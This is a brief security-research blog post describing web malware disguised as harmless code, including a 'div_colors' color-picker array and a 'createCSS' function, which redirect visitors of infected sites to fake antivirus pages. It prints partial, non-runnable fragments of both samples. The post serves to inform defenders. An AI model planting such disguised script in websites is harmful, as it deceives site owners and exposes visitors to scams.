Malware week: The div_colors, CreateCSS and others

We are starting to see an interesting trend regarding how the latest web-based malware is being distributed. Instead of heavily encoding the malicious code on the infected web sites, attackers are now trying to make it look like legitimate code.


For example, the div_colors malware that infected a lot of osCommerce sites, looks like a javascript color picker. This is how it looks like in an infected site:

if (typeof(redef_colors)==”undefined”) {

var div_colors = new Array("#4b8272′, "#81787f’, ‘#832f83′, ‘#887f74′, ‘#4c3183′, ‘#748783′, ‘#3e7970′, ‘#857082′, ‘#728178′, ‘#7f8331′, ‘#2f8281′, ‘#724c31′, ‘#778383′, ‘#7f493e’, ‘#3e7a84′, ‘#82837e’, ‘#40403d’, ‘#727e7c’, ‘#3e7982′, ‘#3e7980′, ‘#847481′, ‘#883d7c’, ‘#787d3d’, ‘#7f777f’, "#314d00′);

The idea here is anyone looking for it may mistake it for a legitimate color picker script, or something non-malicious. In fact, in the osCommerce forums many people said it was non-malicious… Instead, the code redirects the site to a fake anti virus from multiple intermediaries:


Another one that is confusing a lot of users is the CreateCSS malware. It looks like this in an infected site:

<script>function createCSS(selector,declaration)
var ua=navigator.userAgent.toLowerCase();
var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.te..

This is very easy to confuse with a CSS function or something like that (you can see the full malware dump here:

An interesting shift regarding how the attackers are infecting web sites. But we will keep watching them :)

Site hacked? Infected with malware? Blacklisted? Yes, we clean up and monitor web sites.

About David Dede

David Dede is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.